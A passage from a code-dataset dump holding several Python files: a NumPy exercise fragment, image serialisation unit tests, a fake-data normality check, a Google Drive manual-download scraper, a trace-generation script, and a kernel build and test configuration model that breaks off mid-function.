arr4[arr4%2!=0]=-1\n# print(arr4)\n\n# 7.给定数组[1, 2, 3, 4, 5],获取到平均值,将平均值插入到每个元素直接得到新的数组\n arr = np.array([1, 2, 3, 4, 5])\n arr6=np.insert(arr, np.arange(1, len(arr)), arr.mean())\n print(arr6)\n# 8.创建一个5*5的随机值数组,并找到最大值,并替换为0\n# arr5=np.random.randint(1,10,size=25).reshape(5,5)\n# print(arr5.max())\n# arr6=arr5[arr5==arr5.max()]=0\n# print(arr5)\n","repo_name":"2845666517/course_3","sub_path":"day1_numpy/exam2.py","file_name":"exam2.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32941865651","text":"import shutil, tempfile\nimport numpy as np\nfrom os import path\nfrom skimage import data\nimport skimage.io as skimgio\nimport imghdr\nfrom PIL import Image\nfrom img2d import Img2DColumn, Img2DSerDe, Img2DColumnMetadata, Img2DReader, ImgNormalizationTransform\nimport unittest\nimport random\n\ntest_csv_file = 'test.csv'\ntest_img_file = 'test-img.png'\n\n\ndef create_test_data():\n test_dir = tempfile.mkdtemp()\n # Create and save image\n image = data.camera()\n img = Image.fromarray(image)\n test_img_file_path = path.join(test_dir, test_img_file)\n img.save(test_img_file_path)\n\n return test_dir, test_img_file_path\n\n\nclass TestImg2DSerDe(unittest.TestCase):\n def setUp(self):\n self.test_dir, self.test_img_file_path = create_test_data()\n\n def tearDown(self):\n shutil.rmtree(self.test_dir)\n\n def test_img2d_ser_de_is_raw_img_true(self):\n img2d_col = Img2DColumn(columns_indexes=[0], pre_transforms=[], post_transforms=[], is_raw_img=True)\n reader = img2d_col.reader\n ser_de = img2d_col.ser_de\n img = reader.read([self.test_img_file_path])\n img_s = ser_de.serialize(img)\n img_d = ser_de.deserialize(img_s)\n self.assertTrue(np.array_equal(img[0], img_d))\n\n def test_img2d_ser_de_is_raw_img_false(self):\n img2d_col = Img2DColumn(columns_indexes=[0], pre_transforms=[], post_transforms=[], is_raw_img=False)\n reader = img2d_col.reader\n ser_de = img2d_col.ser_de\n img = reader.read([self.test_img_file_path])\n img_s = ser_de.serialize(img)\n img_d = ser_de.deserialize(img_s)\n self.assertTrue(np.array_equal(img[0], img_d))\n\n\nclass TestImg2DMetadata(unittest.TestCase):\n def setUp(self):\n self.test_dir, self.test_img_file_path = create_test_data()\n\n def tearDown(self):\n shutil.rmtree(self.test_dir)\n\n def test_img2d_column_metadata(self):\n img2d_col = Img2DColumn(columns_indexes=[0], pre_transforms=[], post_transforms=[])\n aggregated_metadata = []\n for i in range(0, 5):\n img, img_fmt = img2d_col.reader.read([self.test_img_file_path])\n metadata = Img2DColumnMetadata()\n metadata.aggregate(img=img)\n aggregated_metadata.append(metadata)\n img2d_col.metadata.merge(aggregated_metadata)\n mean_img = img2d_col.metadata.img\n original_img = img2d_col.reader.read([self.test_img_file_path])[0]\n # Should be equal because we are using the same image\n self.assertTrue(np.array_equal(mean_img, original_img))\n\n\n# class TestImg2DImgNormalizationTransform(unittest.TestCase):\n# def setUp(self):\n# self.test_dir, self.test_img_file_path = create_test_data()\n#\n# def tearDown(self):\n# shutil.rmtree(self.test_dir)\n#\n# def test_img2d_normalization(self):\n# img_data = skimgio.imread(self.test_img_file_path)\n# img_fmt = imghdr.what(self.test_img_file_path)\n# data = img_data, img_fmt\n# transform = ImgNormalizationTransform(True)\n# tr_data = transform.apply(data)\n# self.assertTrue(np.array_equal(data[0], tr_data[0]))\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"SummaLabs/DLS","sub_path":"app/backend/core/dataset/img2d_test.py","file_name":"img2d_test.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"36086322319","text":"# generating fake data\n\nimport pandas as pd\nimport numpy as np\nfrom faker import Faker\n\n# Initialize Faker\nfake = Faker()\n\n# Set a seed for reproducibility\nseed = 42\nnp.random.seed(seed)\nFaker.seed(seed)\n\n# Number of samples\nn = 100\n\n# Create a DataFrame\ndf = pd.DataFrame({\n 'ID': [fake.uuid4() for _ in range(n)],\n 'Blood Glucose': np.concatenate([\n np.random.normal(150, 20, int(n/4)), # Diabetic & Overweight\n np.random.normal(130, 15, int(n/4)), # Diabetic & Not Overweight\n np.random.normal(100, 10, int(n/4)), # Non-diabetic & Overweight\n np.random.normal(90, 7, int(n/4)) # Non-diabetic & Not Overweight\n ]),\n 'Diabetic Status': np.concatenate([\n ['Diabetic'] * int(n/2),\n ['Non-diabetic'] * int(n/2)\n ]),\n 'Weight Status': np.concatenate([\n ['Overweight', 'Not Overweight'] * int(n/2)\n ])\n})\n\n# Shuffle the rows to make it more realistic\ndf = df.sample(frac=1).reset_index(drop=True)\n\n\n### checking for normality with Shapiro-Wilk test\n\n## way 1 \nimport scipy.stats as stats\n\ncombinations = [\n ('Diabetic', 'Overweight'),\n ('Diabetic', 'Not Overweight'),\n ('Non-diabetic', 'Overweight'),\n ('Non-diabetic', 'Not Overweight')\n]\n\nfor diabetic_status, weight_status in combinations:\n subset = df[(df['Diabetic Status'] == diabetic_status) & (df['Weight Status'] == weight_status)]\n _, p_value = stats.shapiro(subset['Blood Glucose'])\n \n print(f\"Group ({diabetic_status}, {weight_status}):\")\n print(f\"P-value from Shapiro-Wilk Test: {p_value}\\n\")\n\n## way 2\n\nimport scipy.stats as stats\n\ngroups = df.groupby(['Diabetic Status', 'Weight Status'])\n\nfor (diabetic_status, weight_status), group_df in groups:\n _, p_value = stats.shapiro(group_df['Blood Glucose'])\n \n print(f\"Group ({diabetic_status}, {weight_status}):\")\n print(f\"P-value from Shapiro-Wilk Test: {p_value}\\n\")\n\n\n## visualization\n\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n# For demonstration purposes, let's use one of the subsets:\nsubset = df[(df['Diabetic Status'] == \"Diabetic\") & (df['Weight Status'] == \"Overweight\")]\n\n# Histogram\nplt.hist(subset['Blood Glucose'], bins=20, edgecolor='k', alpha=0.7)\nplt.title('Histogram of Blood Glucose Levels')\nplt.xlabel('Blood Glucose Level')\nplt.ylabel('Frequency')\nplt.show()\n\n# Q-Q Plot\nstats.probplot(subset['Blood Glucose'], plot=plt)\nplt.title('Q-Q Plot of Blood Glucose Levels')\nplt.show()","repo_name":"hantswilliams/HHA_507_2023","sub_path":"WK6/code/python/normality.py","file_name":"normality.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"72"} +{"seq_id":"20462046519","text":"import requests\r\nimport os\r\nimport tqdm\r\nfrom lxml import etree\r\nfrom multiprocessing.pool import ThreadPool #import ThreadPool\r\nimport time\r\n# 使用requests库获取网页内容\r\nresponse = requests.get('https://www.gadget-manual.com/dell/')\r\nhtml = response.content\r\n\r\n# 使用xpath解析网页内容\r\nselector = etree.HTML(html)\r\n#download_links0 = selector.xpath('/html/body/div[1]/div/div[4]/div/div[2]/div/div[2]/div/p/a/@href')#nvidia or amd or anrock\r\n#download_links0 = selector.xpath('/html/body/div[1]/div/div[4]/div/div[2]/div/div[2]/div/p/a/@href')\r\ndownload_links0 = selector.xpath('/html/body/div[1]/div/div[4]/div/div[2]/div/div[2]/div/p/u/a/@href')#hp\r\nif len(download_links0)<50:\r\n download_links0 = selector.xpath('/html/body/div[1]/div/div[4]/div/div[2]/div/div[2]/div/p/a/@href')\r\nif len(download_links0)<50:\r\n download_links0 = selector.xpath('/html/body/div[1]/div/div[4]/div/div[2]/div/div[2]/div/div/div[1]/div/p/u/a/@href')\r\n\r\n# 创建文件夹\r\nif not os.path.exists('D:/tuzhi'):\r\n os.makedirs('D:/tuzhi')\r\nproxies = {\r\n \"http\": \"http://127.0.0.1:7890\",\r\n \"https\": \"http://127.0.0.1:7890\",\r\n}\r\nhe = {\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'\r\n}\r\n\r\nmax = len(download_links0)\r\nprint('链接数量',max)\r\nx1 = 0\r\n\r\n#定义下载函数\r\ndef download(link0):\r\n try:\r\n x=download_links0.index(link0)\r\n print('开始第{}个'.format(x))\r\n response0 = requests.get(link0,proxies=proxies,headers=he,timeout=6)\r\n html0 = response0.text\r\n # 使用xpath解析网页内容并获取文件名\r\n selector0 = etree.HTML(html0)\r\n filename0 = selector0.xpath('/html/head/meta[4]/@content')[0]#获取文件名\r\n print('文件名',filename0)\r\n # 将文件名按规则替换为下载链接\r\n link = link0.replace('/view?usp=sharing', '&export=download').replace('/file/d/', '/u/0/uc?id=').replace('/open?id=', '/u/0/uc?id=').replace('/view?usp=drivesdk','&export=download')#HP\r\n if '&export=download' not in link:\r\n link=link+'&export=download'\r\n\r\n\r\n filepath = 'D:/tuzhi/' + filename0#文件保存路径\r\n print(link)#打印下载链接\r\n\r\n try:\r\n # 计算下载文件的大小,如果小于5kb就重新下载\r\n response = requests.get(link,proxies=proxies,headers=he, stream=True)\r\n with open(filepath,'wb') as f:\r\n f.write(response.content)\r\n f.close()\r\n if os.path.exists(filepath):# 计算下载文件的大小,如果小于5kb就重新下载\r\n size = os.path.getsize(filepath)\r\n sizekb = '%.1f'%(size/1000)\r\n print('第{}个文件大小{}kb'.format(x,sizekb))\r\n while(1):\r\n if size > 5*1024:\r\n print('跳过')\r\n break \r\n else:\r\n time(5)\r\n print('{}重来!'.format(x))\r\n response = requests.get(link,proxies=proxies,headers=he, stream=True)\r\n with open(filepath,'wb') as f:\r\n f.write(response.content)\r\n f.close()\r\n size = os.path.getsize(filepath)\r\n \r\n\r\n except:\r\n print('错误',link)\r\n except:\r\n print('跳过{}'.format(x))\r\n x+=1\r\n\r\n#使用线程池\r\npool = ThreadPool(5) #线程数5\r\npool.map(download, download_links0[x1:max])\r\npool.close()\r\npool.join()\r\n\r\n","repo_name":"jxadcx/python_crawler","sub_path":"图纸多线程爬取.py","file_name":"图纸多线程爬取.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70844344234","text":"import torch\nimport numpy as np\nimport random\nimport argparse\nfrom tqdm import tqdm\nrandom.seed(0)\n\nif __name__ == '__main__':\n file1 = open(\"../dlrm_embedding_temp/fbgemm_t856_bs65536_15_dataset_cache_miss_trace.txt\",\"r\")\n file2 = open(\"../dlrm_embedding_temp/fbgemm_t856_bs65536_15_prefetch_trace.txt\",\"w\")\n content_list = file1.readlines()\n\n start = 0\n end = len(content_list)\n interval = 5\n l = np.arange(start, end , interval)\n for i in tqdm(l):\n new_content = [0,int(float(content_list[i])),random.randint(0, 412403234),int(float(content_list[i+2])),0]\n file2.write(str(new_content))\n file2.write(\"\\n\")\n for j in range(4):\n file2.write(str([0,0,0,0,0]))\n file2.write(\"\\n\")\n file1.close()\n file2.close()\n\n","repo_name":"HaibaraAiChan/graph_partition_multi_layers","sub_path":"bakcode/optgen/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18156832187","text":"import yaml\n\n\n# -----------------------------------------------------------------------------\n# Common classes for all config types\n#\n\nclass YAMLObject(object):\n \"\"\"Base class with helper methods to initialise objects from YAML data.\"\"\"\n\n @classmethod\n def _kw_from_yaml(cls, data, args):\n \"\"\"Create some keyword arguments based on a YAML dictionary\n\n Return a dictionary suitable to be used as Python keyword arguments in\n an object constructor using values from some YAML *data*. The *args*\n is a list of keys to look up from the *data* and convert to a\n dictionary. Keys that are not in the YAML data are simply omitted from\n the returned keywords, relying on default values in object\n constructors.\n \"\"\"\n return {\n k: v for k, v in ((k, data.get(k)) for k in args) if v\n } if data else dict()\n\n\nclass Filter(object):\n \"\"\"Base class to implement arbitrary configuration filters.\"\"\"\n\n def __init__(self, items):\n \"\"\"The *items* can be any data used to filter configurations.\"\"\"\n self._items = items\n\n def match(self, **kw):\n \"\"\"Return True if the given *kw* keywords match the filter.\"\"\"\n raise NotImplementedError(\"Filter.match() is not implemented\")\n\n\nclass Blacklist(Filter):\n \"\"\"Blacklist filter to discard certain configurations.\n\n Blacklist *items* are a dictionary associating keys with lists of values.\n Any configuration with a key-value pair present in these lists will be\n rejected.\n \"\"\"\n\n def match(self, **kw):\n for k, v in kw.iteritems():\n bl = self._items.get(k)\n if not bl:\n continue\n if any(x in v for x in bl):\n return False\n\n return True\n\n\nclass Whitelist(Filter):\n \"\"\"Whitelist filter to only accept certain configurations.\n\n Whitelist *items* are a dictionary associating keys with lists of values.\n For a configuration to be accepted, there must be a value found in each of\n these lists.\n \"\"\"\n\n def match(self, **kw):\n for k, wl in self._items.iteritems():\n v = kw.get(k)\n if not v:\n return False\n if not any(x in v for x in wl):\n return False\n\n return True\n\n\nclass Combination(Filter):\n \"\"\"Combination filter to only accept some combined configurations.\n\n Combination *items* are a dictionary with 'keys' and 'values'. The 'keys'\n are a list of keywords to look for, and 'values' are a list of combined\n values for the given keys. The length of each 'values' item must therefore\n match the length of the 'keys' list, and the order of the values must match\n the order of the keys.\n \"\"\"\n\n def __init__(self, items):\n self._keys = tuple(items['keys'])\n self._values = list(tuple(values) for values in items['values'])\n\n def match(self, **kw):\n filter_values = tuple(kw.get(k) for k in self._keys)\n return filter_values in self._values\n\n\nclass FilterFactory(YAMLObject):\n \"\"\"Factory to create filters from YAML data.\"\"\"\n\n _classes = {\n 'blacklist': Blacklist,\n 'whitelist': Whitelist,\n 'combination': Combination,\n }\n\n @classmethod\n def from_yaml(cls, filter_params):\n \"\"\"Iterate through the YAML filters and return Filter objects.\"\"\"\n filter_list = []\n for f in filter_params:\n for filter_type, items in f.iteritems():\n filter_cls = cls._classes[filter_type]\n filter_list.append(filter_cls(items))\n return filter_list\n\n @classmethod\n def from_data(cls, data, default_filters=None):\n \"\"\"Look for filters in YAML *data* or return *default_filters*.\n\n Look for a *filters* element in the YAML *data* dictionary. If there\n is one, iterate over each item to return a list of Filter objects.\n Otherwise, return *default_filters*.\n \"\"\"\n params = data.get('filters')\n return cls.from_yaml(params) if params else default_filters\n\n\n# -----------------------------------------------------------------------------\n# Build configs\n#\n\nclass Tree(YAMLObject):\n \"\"\"Kernel git tree model.\"\"\"\n\n def __init__(self, name, url):\n \"\"\"A kernel git tree is essentially a repository with kernel branches.\n\n *name* is the name of the tree, such as \"mainline\" or \"next\".\n *url* is the git remote URL for the tree.\n \"\"\"\n self._name = name\n self._url = url\n\n @classmethod\n def from_yaml(cls, config, name):\n kw = {\n 'name': name,\n }\n kw.update(cls._kw_from_yaml(config, ['url', 'name']))\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def url(self):\n return self._url\n\n\nclass Fragment(YAMLObject):\n \"\"\"Kernel config fragment model.\"\"\"\n\n def __init__(self, name, path, configs=None, defconfig=None):\n \"\"\"A kernel config fragment is a list of config options in file.\n\n *name* is the name of the config fragment so it can be referred to in\n other configuration objects.\n\n *path* is the path where the config fragment either can be found,\n either from the git checkout or after being generated.\n\n *configs* is an optional list of kernel configs to use when generating\n a config fragment that does not exist in the git checkout.\n\n *defconfig* is an optional defconfig name to use as a make target\n instead of a real config path. This is only used for\n special cases such as the tiny.config fragment which needs\n to be built with the tinyconfig make target.\n \"\"\"\n self._name = name\n self._path = path\n self._configs = configs or list()\n self._defconfig = defconfig\n\n @classmethod\n def from_yaml(cls, config, name):\n kw = {\n 'name': name,\n }\n kw.update(cls._kw_from_yaml(config, [\n 'name', 'path', 'configs', 'defconfig',\n ]))\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def path(self):\n return self._path\n\n @property\n def configs(self):\n return list(self._configs)\n\n @property\n def defconfig(self):\n return self._defconfig\n\n\nclass Architecture(YAMLObject):\n \"\"\"CPU architecture attributes.\"\"\"\n\n def __init__(self, name, base_defconfig='defconfig', extra_configs=None,\n fragments=None, filters=None):\n \"\"\"Particularities to build kernels for each CPU architecture.\n\n *name* is the CPU architecture name as per the kernel's convention.\n\n *base_defconfig* is the defconfig used by default and as a basis when\n adding fragments.\n\n *extra_configs* is a list of extra defconfigs and make targets to\n build, for example allnoconfig, allmodconfig and any\n arbitrary some_defconfig+CONFIG_XXX=y definitions.\n\n *fragments* is a list of CPU-specific config fragments to build if\n present.\n\n *filters* is a list of filters to limit the number of builds, typically\n using a list of defconfigs to blacklist or whitelist.\n \"\"\"\n self._name = name\n self._base_defconfig = base_defconfig\n self._extra_configs = extra_configs or []\n self._fragments = fragments or []\n self._filters = filters or list()\n\n @classmethod\n def from_yaml(cls, data, name, fragments):\n kw = {\n 'name': name,\n }\n kw.update(cls._kw_from_yaml(data, [\n 'name', 'base_defconfig', 'extra_configs',\n ]))\n cf = data.get('fragments')\n kw['fragments'] = [fragments[name] for name in cf] if cf else None\n kw['filters'] = FilterFactory.from_data(data)\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def base_defconfig(self):\n return self._base_defconfig\n\n @property\n def extra_configs(self):\n return list(self._extra_configs)\n\n @property\n def fragments(self):\n return list(self._fragments)\n\n def match(self, params):\n return all(f.match(**params) for f in self._filters)\n\n\nclass BuildEnvironment(YAMLObject):\n \"\"\"Kernel build environment model.\"\"\"\n\n def __init__(self, name, cc, cc_version, arch_map=None):\n \"\"\"A build environment is a compiler and tools to build a kernel.\n\n *name* is the name of the build environment so it can be referred to in\n other parts of the build configuration. Typical build\n environment names include the compiler type and version such as\n \"gcc-7\" although this is entirely arbitrary.\n\n *cc* is the compiler type, such as \"gcc\" or \"clang\". This is\n functional and indicates the actual compiler binary being used.\n\n *cc_version* is the full version of the compiler.\n\n *arch_map* is a dictionary mapping kernel CPU architecture names to\n ones used in compiler names. For example, gcc compilers are\n the same \"x86\" for both \"i386\" and \"x86_64\" kernel\n architectures.\n \"\"\"\n self._name = name\n self._cc = cc\n self._cc_version = str(cc_version)\n self._arch_map = arch_map or dict()\n\n @classmethod\n def from_yaml(cls, config, name):\n kw = {\n 'name': name,\n }\n kw.update(cls._kw_from_yaml(\n config, ['name', 'cc', 'cc_version', 'arch_map']))\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def cc(self):\n return self._cc\n\n @property\n def cc_version(self):\n return self._cc_version\n\n def get_arch_name(self, kernel_arch):\n return self._arch_map.get(kernel_arch, kernel_arch)\n\n\nclass BuildVariant(YAMLObject):\n \"\"\"A variant of a given build configuration.\"\"\"\n\n def __init__(self, name, architectures, build_environment, fragments=None):\n \"\"\"A build variant is a sub-section of a build configuration.\n\n *name* is the name of the build variant. It is arbitrary and defined\n to be able to refer to the build variant in other parts of the\n build configurations or the code using it.\n\n *architectures* is a list of Architecture objects. There can only be\n one Architecture object for any given kernel CPU\n architecture name. This list defines the architectures\n that should be built for a given build variant.\n\n *build_environment\" is a BuildEnvironment object, to define which\n compiler to use to build the kernels.\n\n *fragments* is an optional list of Fragment objects to define fragments\n to build with this build variant.\n \"\"\"\n self._name = name\n self._architectures = architectures\n self._build_environment = build_environment\n self._fragments = fragments or list()\n\n @classmethod\n def from_yaml(cls, config, name, fragments, build_environments):\n kw = {\n 'name': name,\n }\n kw.update(cls._kw_from_yaml(\n config, ['name', 'build_environment', 'fragments']))\n kw['build_environment'] = build_environments[kw['build_environment']]\n kw['architectures'] = list(\n Architecture.from_yaml(data or {}, name, fragments)\n for name, data in config['architectures'].iteritems()\n )\n cf = kw.get('fragments')\n kw['fragments'] = [fragments[name] for name in cf] if cf else None\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def arch_list(self):\n return list(arch.name for arch in self._architectures)\n\n @property\n def architectures(self):\n return list(self._architectures)\n\n @property\n def build_environment(self):\n return self._build_environment\n\n @property\n def fragments(self):\n return list(self._fragments)\n\n\nclass BuildConfig(YAMLObject):\n \"\"\"Build configuration model.\"\"\"\n\n def __init__(self, name, tree, branch, variants):\n \"\"\"A build configuration defines the actual kernels to be built.\n\n *name* is the name of the build configuration. It is arbitrary and\n used in other places to refer to the build configuration.\n\n *tree* is a Tree object, where the kernel branche to be built can be\n found.\n\n *branch* is the name of the branch to build. There can only be one\n branch in each BuildConfig object.\n\n *variants* is a list of BuildVariant objects, to define all the\n variants to build for this tree / branch combination.\n \"\"\"\n self._name = name\n self._tree = tree\n self._branch = branch\n self._variants = variants\n\n @classmethod\n def from_yaml(cls, config, name, trees, fragments, build_envs, defaults):\n kw = {\n 'name': name,\n }\n kw.update(cls._kw_from_yaml(\n config, ['name', 'tree', 'branch']))\n kw['tree'] = trees[kw['tree']]\n config_variants = config.get('variants', defaults)\n variants = [\n BuildVariant.from_yaml(variant, name, fragments, build_envs)\n for name, variant in config_variants.iteritems()\n ]\n kw['variants'] = {v.name: v for v in variants}\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def tree(self):\n return self._tree\n\n @property\n def branch(self):\n return self._branch\n\n @property\n def variants(self):\n return list(self._variants.values())\n\n def get_variant(self, name):\n return self._variants[name]\n\n\n# -----------------------------------------------------------------------------\n# Test configs\n#\n\nclass DeviceType(YAMLObject):\n \"\"\"Device type model.\"\"\"\n\n def __init__(self, name, mach, arch, boot_method, dtb=None,\n flags=None, filters=None, context=None):\n \"\"\"A device type describes a category of equivalent hardware devices.\n\n *name* is unique for the device type, typically as used by LAVA.\n *mach* is the name of the SoC manufacturer.\n *arch* is the CPU architecture following the Linux kernel convention.\n *boot_method* is the name of the boot method to use.\n *dtb* is an optional name for a device tree binary.\n *flags* is a list of optional arbitrary strings.\n *filters* is a list of Filter objects associated with this device type.\n *context* is an arbirary dictionary used when scheduling tests.\n \"\"\"\n self._name = name\n self._mach = mach\n self._arch = arch\n self._boot_method = boot_method\n self._dtb = dtb\n self._flags = flags or list()\n self._filters = filters or list()\n self._context = context or dict()\n\n def __repr__(self):\n return self.name\n\n @property\n def name(self):\n return self._name\n\n @property\n def mach(self):\n return self._mach\n\n @property\n def arch(self):\n return self._arch\n\n @property\n def boot_method(self):\n return self._boot_method\n\n @property\n def dtb(self):\n return self._dtb\n\n @property\n def context(self):\n return self._context\n\n def get_flag(self, name):\n return name in self._flags\n\n def match(self, flags, config):\n \"\"\"Checks if the given *flags* and *config* match this device type.\"\"\"\n return (\n all(not v or self.get_flag(k) for k, v in flags.iteritems()) and\n all(f.match(**config) for f in self._filters)\n )\n\n\nclass DeviceType_arm(DeviceType):\n\n def __init__(self, name, mach, arch='arm', *args, **kw):\n \"\"\"arm device type with a device tree.\"\"\"\n kw.setdefault('dtb', '{}.dtb'.format(name))\n super(DeviceType_arm, self).__init__(name, mach, arch, *args, **kw)\n\n\nclass DeviceType_arm64(DeviceType):\n\n def __init__(self, name, mach, arch='arm64', *args, **kw):\n \"\"\"arm64 device type with a device tree.\"\"\"\n kw.setdefault('dtb', '{}/{}.dtb'.format(mach, name))\n super(DeviceType_arm64, self).__init__(name, mach, arch, *args, **kw)\n\n\nclass DeviceTypeFactory(YAMLObject):\n \"\"\"Factory to create device types from YAML data.\"\"\"\n\n _classes = {\n 'arm-dtb': DeviceType_arm,\n 'arm64-dtb': DeviceType_arm64,\n }\n\n @classmethod\n def from_yaml(cls, name, device_type, default_filters=None):\n kw = cls._kw_from_yaml(device_type, [\n 'mach', 'arch', 'boot_method', 'dtb', 'flags', 'context'])\n kw.update({\n 'name': device_type.get('name', name),\n 'filters': FilterFactory.from_data(device_type, default_filters),\n })\n cls_name = device_type.get('class')\n device_cls = cls._classes[cls_name] if cls_name else DeviceType\n return device_cls(**kw)\n\n\nclass RootFSType(YAMLObject):\n \"\"\"Root file system type model.\"\"\"\n\n def __init__(self, url, arch_dict=None):\n \"\"\"A root file system type covers common file system features.\n\n *url* is the base URL for file system binaries. Each file system\n variant will have some URLs based on this one with various\n formats and architectures.\n\n *arch_dict* is a dictionary to map CPU architecture names following the\n kernel convention with distribution architecture names as\n used by the file system type. Keys are the names used by\n the root file system type (distro), and values are lists of\n dictionaries with kernel architecture names and other\n properties such as the endinanness.\n \"\"\"\n self._url = url\n self._arch_dict = arch_dict or dict()\n\n @classmethod\n def from_yaml(cls, fs_type):\n kw = cls._kw_from_yaml(fs_type, ['url'])\n arch_map = fs_type.get('arch_map')\n if arch_map:\n arch_dict = {}\n for arch_name, arch_dicts in arch_map.iteritems():\n for d in arch_dicts:\n key = tuple((k, v) for (k, v) in d.iteritems())\n arch_dict[key] = arch_name\n kw['arch_dict'] = arch_dict\n return cls(**kw)\n\n @property\n def url(self):\n return self._url\n\n def get_arch_name(self, arch, endian):\n arch_key = ('arch', arch)\n endian_key = ('endian', endian)\n arch_name = (self._arch_dict.get((arch_key, endian_key)) or\n self._arch_dict.get((arch_key,), arch))\n return arch_name\n\n\nclass RootFS(YAMLObject):\n \"\"\"Root file system model.\"\"\"\n\n def __init__(self, url_formats, fs_type, boot_protocol='tftp',\n root_type=None, prompt=\"/ #\"):\n \"\"\"A root file system is any user-space that can be used in test jobs.\n\n *url_formats* are a dictionary with a format string for each type of\n file system available (ramdisk, nfs...). There is\n typically only one entry here for the main *root_type*,\n but multiple entries are possible in particular to boot\n with first a ramdisk and then pivot to nfs root.\n\n *fs_type* is a RootFSType instance.\n\n *boot_protocol* is how the file system is made available to the kernel,\n by default `tftp` typically to download a ramdisk.\n\n *root_type* is the name of the file system type (ramdisk, ...) as used\n in the job template naming scheme.\n\n *prompt* is a string used in the job definition to tell when the\n user-space is available to run some commands.\n \"\"\"\n self._url_format = url_formats\n self._fs_type = fs_type\n self._root_type = root_type or url_formats.keys()[0]\n self._boot_protocol = boot_protocol\n self._prompt = prompt\n self._arch_dict = {}\n\n @classmethod\n def from_yaml(cls, file_system_types, rootfs):\n kw = cls._kw_from_yaml(rootfs, [\n 'boot_protocol', 'root_type', 'prompt'])\n fs_type = file_system_types[rootfs['type']]\n base_url = fs_type.url\n kw['fs_type'] = fs_type\n kw['url_formats'] = {\n fs: '/'.join([base_url, url]) for fs, url in (\n (fs, rootfs.get(fs)) for fs in ['ramdisk', 'nfs'])\n if url\n }\n return cls(**kw)\n\n @property\n def prompt(self):\n return self._prompt\n\n @property\n def boot_protocol(self):\n return self._boot_protocol\n\n @property\n def root_type(self):\n return self._root_type\n\n def get_url(self, fs_type, arch, endian):\n \"\"\"Get the URL of the file system for the given variant and arch.\n\n The *fs_type* should match one of the URL patterns known to this root\n file system.\n \"\"\"\n fmt = self._url_format.get(fs_type)\n if not fmt:\n return None\n arch_name = self._fs_type.get_arch_name(arch, endian)\n return fmt.format(arch=arch_name)\n\n\nclass TestPlan(YAMLObject):\n \"\"\"Test plan model.\"\"\"\n\n _pattern = '{plan}/{category}-{method}-{protocol}-{rootfs}-{plan}-template.jinja2'\n\n def __init__(self, name, rootfs, params=None, category='generic',\n filters=None, pattern=None):\n \"\"\"A test plan is an arbitrary group of test cases to be run.\n\n *name* is the overall arbitrary test plan name, used when looking for\n job template files.\n\n *rootfs* is a RootFS object to be used to run this test plan.\n\n *params\" is a dictionary with parameters to pass to the test job\n generator.\n\n *category* is to classify the type of job to be run, used when looking\n for job template files.\n\n *filters* is a list of Filter objects associated with this test plan.\n\n *pattern* is a string pattern to create the path to the job template\n file, see TestPlan._pattern for the default value with the\n regular template file naming scheme.\n \"\"\"\n self._name = name\n self._rootfs = rootfs\n self._params = params or dict()\n self._category = category\n self._filters = filters or list()\n if pattern:\n self._pattern = pattern\n\n @classmethod\n def from_yaml(cls, name, test_plan, file_systems, default_filters=None):\n kw = {\n 'name': name,\n 'rootfs': file_systems[test_plan['rootfs']],\n 'filters': FilterFactory.from_data(test_plan, default_filters),\n }\n kw.update(cls._kw_from_yaml(test_plan, [\n 'name', 'category', 'pattern', 'params']))\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def rootfs(self):\n return self._rootfs\n\n @property\n def params(self):\n return dict(self._params)\n\n def get_template_path(self, boot_method):\n \"\"\"Get the path to the template file for the given *boot_method*\n\n As different device types use different boot methods (u-boot, grub...),\n each test plan can have several template variants to accomodate for\n these. All the other parameters are attributes of the test plan.\n \"\"\"\n return self._pattern.format(\n category=self._category,\n method=boot_method,\n protocol=self.rootfs.boot_protocol,\n rootfs=self.rootfs.root_type,\n plan=self.name)\n\n def match(self, config):\n return all(f.match(**config) for f in self._filters)\n\n\nclass TestConfig(YAMLObject):\n \"\"\"Test configuration model.\"\"\"\n\n def __init__(self, device_type, test_plans, filters=None):\n \"\"\"A test configuration has a *device_type* and a list of *test_plans*.\n\n *device_type* is a DeviceType object.\n *test_plans* is a list of TestPlan objects to run on the device type.\n \"\"\"\n self._device_type = device_type\n self._test_plans = {\n t.name: t for t in test_plans\n }\n self._filters = filters or list()\n\n @classmethod\n def from_yaml(cls, test_config, device_types, test_plans,\n default_filters=None):\n kw = {\n 'device_type': device_types[test_config['device_type']],\n 'test_plans': [test_plans[test]\n for test in test_config['test_plans']],\n 'filters': FilterFactory.from_data(test_config, default_filters),\n }\n\n return cls(**kw)\n\n @property\n def device_type(self):\n return self._device_type\n\n @property\n def test_plans(self):\n return self._test_plans\n\n def match(self, arch, plan, flags, config):\n return (\n plan in self._test_plans and\n self._test_plans[plan].match(config) and\n self.device_type.arch == arch and\n self.device_type.match(flags, config) and\n all(f.match(**config) for f in self._filters)\n )\n\n def get_template_path(self, plan):\n test_plan = self._test_plans[plan]\n return test_plan.get_template_path(self._device_type.boot_method)\n\n\n# -----------------------------------------------------------------------------\n# Entry points\n#\n\ndef builds_from_yaml(yaml_path):\n with open(yaml_path) as f:\n data = yaml.load(f)\n\n trees = {\n name: Tree.from_yaml(config, name)\n for name, config in data['trees'].iteritems()\n }\n\n 